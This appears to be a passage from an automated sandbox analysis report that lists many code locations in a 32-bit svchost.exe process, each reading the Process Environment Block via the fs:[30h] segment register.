Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h] 1_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h] 1_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h] 1_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h] 1_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h] 1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h] 1_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h] 1_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h] 1_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h] 1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h] 1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h] 1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h] 1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h] 1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h] 1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h] 1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03872619 mov eax, dword ptr fs:[00000030h] 1_2_03872619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h] 1_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03866620 mov eax, dword ptr fs:[00000030h] 1_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03868620 mov eax, dword ptr fs:[00000030h] 1_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383262C mov eax, dword ptr fs:[00000030h] 1_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h] 1_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F866E mov eax, dword ptr fs:[00000030h] 1_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F866E mov eax, dword ptr fs:[00000030h] 1_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h] 1_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h] 1_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03862674 mov eax, dword ptr fs:[00000030h] 1_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03832582 mov eax, dword ptr fs:[00000030h] 1_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h] 1_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03864588 mov eax, dword ptr fs:[00000030h] 1_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h] 1_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h] 1_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h] 1_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h] 1_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h] 1_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h] 1_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h] 1_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h] 1_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h] 1_2_038365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h] 1_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h] 1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h] 1_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h] 1_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h] 1_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h] 1_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h] 1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h] 1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h] 1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h] 1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h] 1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h] 1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h] 1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h] 1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h] 1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h] 1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h] 1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h] 1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h] 1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h] 1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h] 1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h] 1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h] 1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h] 1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03838550 mov eax, dword ptr fs:[00000030h] 1_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03838550 mov eax, dword ptr fs:[00000030h] 1_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386656A mov eax, dword ptr fs:[00000030h] 1_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386656A mov eax, dword ptr fs:[00000030h] 1_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386656A mov eax, dword ptr fs:[00000030h] 1_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h] 1_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038364AB mov eax, dword ptr fs:[00000030h] 1_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h] 1_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h] 1_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h] 1_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03868402 mov eax, dword ptr fs:[00000030h] 1_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03868402 mov eax, dword ptr fs:[00000030h] 1_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03868402 mov eax, dword ptr fs:[00000030h] 1_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h] 1_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h] 1_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h] 1_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h] 1_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h] 1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h] 1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h] 1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h] 1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h] 1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h] 1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h] 1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h] 1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h] 1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h] 1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h] 1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h] 1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h] 1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h] 1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h] 1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h] 1_2_038EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382645D mov eax, dword ptr fs:[00000030h] 1_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385245A mov eax, dword ptr fs:[00000030h] 1_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h] 1_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h] 1_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h] 1_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h] 1_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h] 1_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h] 1_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h] 1_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h] 1_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h] 1_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h] 1_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h] 1_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h] 1_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h] 1_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h] 1_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h] 1_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h] 1_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h] 1_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h] 1_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h] 1_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h] 1_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904B00 mov eax, dword ptr fs:[00000030h] 1_2_03904B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h] 1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h] 1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h] 1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h] 1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h] 1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h] 1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h] 1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h] 1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h] 1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h] 1_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h] 1_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h] 1_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h] 1_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h] 1_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h] 1_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h] 1_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h] 1_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h] 1_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h] 1_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h] 1_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h] 1_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FAB40 mov eax, dword ptr fs:[00000030h] 1_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D8B42 mov eax, dword ptr fs:[00000030h] 1_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828B50 mov eax, dword ptr fs:[00000030h] 1_2_03828B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DEB50 mov eax, dword ptr fs:[00000030h] 1_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382CB7E mov eax, dword ptr fs:[00000030h] 1_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h] 1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h] 1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h] 1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h] 1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h] 1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h] 1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h] 1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h] 1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h] 1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904A80 mov eax, dword ptr fs:[00000030h] 1_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03868A90 mov edx, dword ptr fs:[00000030h] 1_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h] 1_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h] 1_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03886AA4 mov eax, dword ptr fs:[00000030h] 1_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h] 1_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h] 1_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h] 1_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03830AD0 mov eax, dword ptr fs:[00000030h] 1_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h] 1_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h] 1_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h] 1_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h] 1_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BCA11 mov eax, dword ptr fs:[00000030h] 1_2_038BCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386CA24 mov eax, dword ptr fs:[00000030h] 1_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385EA2E mov eax, dword ptr fs:[00000030h] 1_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h] 1_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h] 1_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h] 1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h] 1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h] 1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h] 1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h] 1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h] 1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h] 1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h] 1_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h] 1_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h] 1_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h] 1_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h] 1_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DEA60 mov eax, dword ptr fs:[00000030h] 1_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h] 1_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h] 1_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038309AD mov eax, dword ptr fs:[00000030h] 1_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038309AD mov eax, dword ptr fs:[00000030h] 1_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B89B3 mov esi, dword ptr fs:[00000030h] 1_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h] 1_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h] 1_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C69C0 mov eax, dword ptr fs:[00000030h] 1_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038649D0 mov eax, dword ptr fs:[00000030h] 1_2_038649D0
